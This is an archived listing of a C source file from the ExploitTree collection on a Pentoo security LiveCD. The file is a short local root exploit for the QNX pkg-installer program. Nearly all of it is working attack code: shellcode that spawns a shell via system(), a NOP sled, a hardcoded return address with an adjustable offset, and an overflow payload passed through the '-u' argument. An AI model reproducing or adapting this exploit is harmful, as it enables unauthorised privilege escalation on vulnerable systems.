home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / system / qnx / local / pkg-installer.c < prev    next >
Encoding:
C/C++ Source or Header  |  2005-02-12  |  742 b   |  29 lines
  1. /* Quick and dirty QNX pkg-installer root exploit.
  2.  * The shellcode sucks, it is longer than it has
  3.  * to be and you need the address to system() for 
  4.  * it to work. Yes I know I'm lazy....
  5.  * 
  6.  * http://www.badc0ded.com 
  7. */
  8.  
  9. main(int argc, char **argv)
  10. {
  11.    int ret=0x804786d;
  12.    char *pret;
  13.    char s[]="\xeb\x0e\x31\xc0\x5b"
  14.             "\x88\x43\x2\x53\xbb"
  15.             "\xe4\xb4\x04\x08"       //system() address
  16.             "\xff\xd3\xe8\xed\xff"
  17.         "\xff\xff\x73\x68";
  18.    char payload[2000];
  19.    if (argc>=2)
  20.       ret=ret-atoi(argv[1]);
  21.    pret=&ret;
  22.    printf("using ret %x\n",ret);
  23.    memset(payload,0x90,1254);
  24.    sprintf(payload+1254,"%s%s",s,pret);
  25.    execlp("/usr/photon/bin/pkg-installer","pkg-installer","-u",payload,0);
  26.  
  27. }
  28.  
  29.